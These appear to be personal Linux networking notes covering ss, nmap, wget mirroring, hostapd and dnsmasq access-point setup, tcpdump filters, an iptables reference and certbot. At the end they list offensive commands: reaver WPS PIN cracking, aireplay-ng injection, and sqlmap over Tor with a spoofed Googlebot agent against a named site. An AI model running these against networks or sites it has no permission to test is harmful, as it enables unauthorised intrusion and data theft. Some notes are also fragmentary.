ss is a utility to investigate network ports and is part of the iproute2 package. It has a similar functionality to the deprecated netstat utility. See ss(8), Common usage includes:
||Display all TCP Sockets w/ service names|
||Display all TCP Sockets w/ port numbers|
||Display all UDP Sockets|
Nmap has a shodan plugin: nmap --script=shodan-api --script-args='shodan-api.apikey=XXXXXX' google.com
|-sn||Disable Port Scan|
|-Pn||Skip host discovery, don't ping the host|
|-n||Skip DNS Resolution|
namp will realize it has nothing left to do and will run the shodan-api script. You could also set the api-key directly into the nse script too.
Download entire website:
wget -m -p -E -k www.example.com
||Infinite recursion & time-stamp, keep FTP dir list.|
||Get all images, etc. needed to display HTML page.|
||Save HTML/CSS files with .html/.css extensions.|
||Make links in downloaded HTML point to local files.|
wget \ --recursive \ --no-clobber \ --page-requisites \ --html-extension \ --convert-links \ --restrict-file-names=windows \ --domains website.org \ --no-parent \ www.website.org/tutorials/html/
Note: Debian 10, look at /etc/default/isc-dhcp-server, make sure you have added all the interfaces you want dhcp server to be on, also Hostapd need to make sure you unmask first:
systemctl unmask systemctl enable systemctl start hostapd
Note: Ubuntu, look at /etc/ufw/sysctl.conf make sure you have uncommented net/ipv4/ip_forward=1.
# loopback network interface auto lo iface lo inet loopback # Management network interface auto eth0 iface eth0 inet dhcp post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6 #wireless access point auto wlan0 iface wlan0 inet static address 10.4.0.14 netmask 255.255.255.240 # gateway 10.4.0.14 wireless-mode Master post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6 #auto eth1 #iface eth1 inet static # address 10.0.0.1 # netmask 255.255.255.0 #iface eth1 inet manual # up ip link set $IFACE promisc on arp off up # down ip link set $IFACE promisc off down # post-up ethtool -G $IFACE rx ; for i in rx tx sg tso ufo gso gro lro; do ethtool -K $IFACE $i off; done #post-up echo 1 > /proc/sys/net/ipv6/conf/$IFACE/disable_ipv6
Note: To stop Network Manager from messing with the internal interfaces, we added the keyfile and the mac addresses of the NICs and WIFIs that it is not suppose to manage.
[main] plugins=ifupdown,keyfile,ofono dns=dnsmasq [ifupdown] managed=false [keyfile] unmanaged-devices=mac:00:50:ba:d7:fe:b6;mac:00:1c:26:1b:ea:fa
Note: If you want to use dnsmasq in Debian then look at /etc/defaults/dnsmasq file, make sure ENABLE is set:
# by setting DNSMASQ_OPTS to --conf-file=<file> DNSMASQ_OPTS="--conf-file=/etc/dnsmasq.alt" # Whether or not to run the dnsmasq daemon; set to 0 to disable. ENABLED=1
Note: Here's an example simple configuration for dnsmasq, the file could be /etc/dnsmasq.alt:
no-resolv bind-interfaces interface=wlan0 dhcp-range=10.4.0.1,10.4.0.13,4h # opendns nameervers server=220.127.116.11 server=18.104.22.168 # nameservers from google #server=22.214.171.124 #server=126.96.36.199 log-dhcp
Note: Enable hostapd, in /etc/defaults:
Note: Here's a simple hostapd.conf configuration:
interface=wlan0 driver=nl80211 ssid=************************** logger_syslog=-1 logger_syslog_level=1 hw_mode=g #wmm_enabled=1 #nl80211=1 channel=8 macaddr_acl=0 #auth_algs=1 ignore_broadcast_ssid=0 wpa=3 wpa_passphrase=***************** wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP rsn_pairwise=CCMP
This I have not tested fully, but it's something to try out in the future. Dnsmasq combined with dnscrypt-proxy provide caching, encryption and server-side authentication. Said to be useful to protect a laptop from potentially hostile networks.
apt-get install dnsmasq dnscrypt-proxy
Configure /etc/resolv.conf to use dnsmasq:
# ignore resolv.conf no-resolv # Listen only on localhost listen-address=127.0.0.1 # dnscrypt is on port 40 server=127.0.0.1#40
Configure /etc/systemd/system/sockets.target.wants/dnscrypt-proxy.socket with the following 5 lines if you are using systemd
[Socket] ListenStream= ListenDatagram= ListenStream=127.0.0.1:40 ListenDatagram=127.0.0.1:40
Then, restart both daemons!
Look at the examples:
man tcpdump | less -Ip examples
Tcpdump filter for HTTP GET:
sudo tcpdump -s 0 -A 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420'
Filter for HTTP POST:
sudo tcpdump -s 0 -A 'tcp dst port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354)'
Monitor HTTP traffic including request and response headers and message body: https://sites.google.com/site/jimmyxu101/testing/use-tcpdump-to-monitor-http-traffic
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip&0xf)<<2)) - ((tcp&0xf0)>>2)) != 0)' tcpdump -X -s 0 'tcp port 80 and (((ip[2:2] - ((ip&0xf)<<2)) - ((tcp&0xf0)>>2)) != 0)'
For more information on the bit-twiddling in the TCP headers see: http://www.wireshark.org/tools/string-cf.html
iptables-restore --testto test if it comes back.
rfkill listto see if interface is blocking at all.
-t filter --the default if none given--
INPUT (for packets destined to local sockets) FORWARD (for packets being routed through the box) OUTPUT (for locally-generated packets)
-t nat --as of 3.7--
PREROUTING (for altering packets as soon as they come in) OUTPUT (for altering locally-genrated packets before routering) POSTROUTING (for altering packets as they are about to go out)
--until 2.4.17-- PREROUTING (for alitering incoming packets before routing) OUTPUT (for altering locally-generated packets before routing) --as of 2.4.18-- INPUT (for packets coming into the box itself) FORWARD (for altering packets being routed through the box) POSTROUTING (for altering packets as they are about to go out)
Note: used to configure exemptions from connection tracking, in combination with the NOTRACK target. It registers at the netfilter hooks with higher priority and is thus called before ip_conntrack, or any other IP tables. PREROUTING (for packets arriving via any network interface) OUTPUT (for packets generated by local processes)
Note: used for MAC (Mandatory Access Control from SELinux) networking rules, such as those enabled by the SECMARK and CONNSECMARK targets. The security table is called after the filter table, allowing any DAC (Discretionary Access Control) rules in filter table to take effect before MAC rules. INPUT (for packets comming into the box itself) OUTPUT (for altering locally-generated packets before routing) FORWARD (for altering packets being routed through the box.
There are 3 types of options. Commands, Parameters, Other Options.
-I, --insert chain [rulenum] rule-specificaation
Note: Insert rule(s) at rulenum, the default is 1 (at the head/top)
-R, --replace chain rulenum rule-specification
Note: Rules are numbered starting at 1
-L, --list [chain]
Note: list all rules or one chain. Like every other iptable command, it applies to the specified table (filter is the default), so NAT rules get listed by:
iptables -t nat -n -Lnote: it is offen used with the -n option to avoid long DNS lookups. note: The exact rules are suppressed until you use:
iptables -L -v
-S, --list-rules [chain]
note: like all other commands, applies to a table (filter is the default).
-F, --flush [chain]
Flush selected chain (all chains in the table if none is given).
-Z, --zero [chain [rulenum]]
Zero out the packet and byte counters in all chains. Its legal to specify -L, --list as well, to see the counters immediately before they are cleared. (See above).
-N, --new-chain chain
Create a new user-defined chain by the given name. (can not pre-exist)
-X, --delete-chain chain
Delete a user created chain, must remove all the rules and references to this chain first. if chain name is not supplied, it will try to delete any chain it can.
-P, --policy chain target
Set ppolicy for a built-in chain to the given target.
-E, --rename-chain old-chain new-chain
The parameters make up a rule specification.
-4, --ipv4 -6, --ipv6
Only used to mix rules in one ip(6)tables-retore command.
[!] -p, --protocol protocol
The protocol of a rule or a packet to check. Can be one of tcp, udp, udplite, icmp, icmpv6, esp, ah, sctp, mh or the special keyword "all", or a numeric value. A protocol name from /etc/protocols is also allowed. 0 is equivlent to all. all will match with all protocols and is taken as default when this option is omitted.
[!] -s, --source address[/mask][,...]
Source address can either be a network name, a host name, a network IP address (with /mask), or a plain IP address. note: Specifying any name to be resolved with a remote query such as DNS is a really bad idea!
[!] -d, --destination address[/mask][,...]
Destination address, see source address above.
-m, --match match
Speifies a match of extension modul that tests for a property. Matches are in the order giving on the command line. If one extension yields false, evaluation will stop.
-j, --jump target
This Specifies the target rule (ie. what to do if the packet matches). Target can be user defined chain, a built-in (which decides the fate of the packet immediately), or an extension. note: if this option is omitted, then matching the rule will have no effect on the packet's fate, but the counters on the rule will be incremented. (unles there is a --goto)
-g, --goto chain
This specifies that the processing should continue in a user specifed chain. Unlike --jump option return will not continue processing in this chain but instead in the chain that called us via --jump
[!] -i, --in-interface name
Name of an interface via which a packet was recieved (only for packets entering the INPUT, FORWARD and PREROUTING chains). note: if interface name ends in a "+", then any interface which begins with this name will match. note: If this option is omitted, any interface name will match.
[!] -o, --out-interface name
Name of an interface via which a packet is going to be sent (for packets entering the FORWARD, OUTPUT and POSTROUTING chains). Same notes as above.
[!] -f, --fragment
Only for ipv4. Rule refers to the second and further IPv4 fragments of fragmented packets.
-c, --set-counters packets bytes
This enables the administrator to initialize the packet and byte counters of a rule (during INSERT, APPEND, REPLACE operations).
^- DO use this!! all the time!!!
wait for the xtables lock.
Don't display hostnames do numerical ip.
display exact numbers instead of with K's M's and G's
only used with -L, --list to display line numbers.
when adding or inserting rules use this modprobe cmd.
iptables -A FORWARD -i eth0 -o eth2 -s 10.0.0.1/24 -d 10.20.0.1/24 -j ACCEPT
iptables -A FORWARD -i eth2 -o eth0 -s 10.20.0.1/24 -d 10.0.0.1/24 -j ACCEPT
iptables -A OUTPUT -o wlan0 -p udp -m udp --dport 68 -j ACCEPT
sudo nmcli connection modify "Wired connection 1" 802-3-ethernet.wake-on-lan magic
echo 1 > "/proc/sys/net/ipv4/ip_forward"
sudo nmcli connection modify "Wired connection 1" 802-3-ethernet.wake-on-lan magic
echo 1 > "/proc/sys/net/ipv4/ip_forward"
## eth0 is INTERNET, wlan0 is LAN. sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
NB: forward in from the tun0 out to virbr0
To connect to VM's with virt-viewer:
virt-viewer -f --connect qemu+ssh://firstname.lastname@example.org/system <NAME>
ovs-vsctl add-br br0
ovs-vsctl add-port br0 eth0
Protocol Issues: -Connection initiation -Negotiation of connection characteristcs -Data formatting -Error detection and correction -connection termination
mount -o bind /dev /mnt/openwrt/dev mount -t proc none /mnt/openwrt/proc
--background --dyndns_system email@example.com -u guest -p guest -a wooowooo.mooo.com,M2xIc25pOWVqMlFJU044QjBSZWZnenIzOjE0NDEzNjcz --update_period_sec 600 --forced_update_period 864000 --log_file /tmp/ddns/ddns.log --cache_dir /tmp/ddns --exec ddns_success ^ this is probably a cronjob. ^ maybe its called inadyn, this is from inadyn.conf
trying to install dnsmasq, got this: Job for dnsmasq.service failed because the control prcess exited with err code. "systemctl status dnsmsaq.service" and "journalctl -xe" for details
invoke-rc.d: initscript dnsmasq, action "start" failed
#!/bin/bash #Initial wifi interface configuration ifconfig $1 up 10.0.0.1 netmask 255.255.255.0 sleep 2 ###########Start DHCP, comment out / add relevant section########## #Thanks to Panji #Doesn't try to run dhcpd when already running if [ "$(ps -e | grep dhcpd)" == "" ]; then dhcpd $1 & fi ########### #Enable NAT iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface $2 -j MASQUERADE iptables --append FORWARD --in-interface $1 -j ACCEPT #Thanks to lorenzo #Uncomment the line below if facing problems while sharing PPPoE, see lorenzo's comment for more details #iptables -I FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu sysctl -w net.ipv4.ip_forward=1 #start hostapd hostapd /etc/hostapd/hostapd.conf 1>/dev/null killall dhcpd
# disables dnsmasq reading any other files like /etc/resolv.conf for nameservers no-resolv # Interface to bind to interface=wlan0 # Specify starting_range,end_range,lease_time dhcp-range=10.0.0.3,10.0.0.20,12h # dns addresses to send to the clients server=188.8.131.52 server=184.108.40.206
###########Start dnsmasq, modify if required########## if [ -z "$(ps -e | grep dnsmasq)" ] then dnsmasq fi ########### #Enable NAT iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface $2 -j MASQUERADE iptables --append FORWARD --in-interface $1 -j ACCEPT #Thanks to lorenzo #Uncomment the line below if facing problems while sharing PPPoE, see lorenzo's comment for more details #iptables -I FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu sysctl -w net.ipv4.ip_forward=1 #start hostapd hostapd /etc/hostapd/hostapd.conf 1> /dev/null killall dnsmasq
Make sure the link is up.
# ip link set dev wlan0_ap up
Had to add this to /etc/NetworkManager/NetworkManager.conf
a> dnsmasq was not setup.. b> AND MORE!!! the IP address was wrong after I got dnsmasq to do dhcp c> I had to log in with another computer (maybe I should have 2 wifi's)
Note: its kind of funny how disconnected things are.
Note: on MarioCoin
It was super easy to setup a new service's Let's Encrypt TLS cert with Apache2 and the command certbot. it was install certbot via apt then run it, this is what I ran:
sudo apt install apache2 certbot sudo certbot --apache -d pong.securityrabbit.com
And it did everything! then setup a systemd timer.
The command that renews the cert, I set up to run every Wed.
and this renews all the certs for this account.
Find WPS wifi APs in the area $ sudo airmon-ng start wlan0 $ wash -i mon0
One of the goals is to get the bssid of the AP. $ airodump-ng mon0 <channel>
To monitor one AP: $ airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0
Test to see if packet inject will work. $ sudo aireplay-ng --test -e HelloKitty08 -a C0:56:27:0B:EB:89 wlan4mon
To inject [untested]: $ aireplay-ng -1 0 -e HelloKitty08 -a C0:56:27:0B:EB:89 -h <SOURCE> mon0
airmon-ng start wlan4 6for channel 6.
Gets the password from the WPS of the AP. $ reaver -i mon0 -b XX:XX:XX:XX:XX:XX
In most cases, such errors suggest:
$ sqlmap --tor --tor-type=SOCKS5 -u \
"http://www.hackable.org/view_section.php?id=10" \ --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"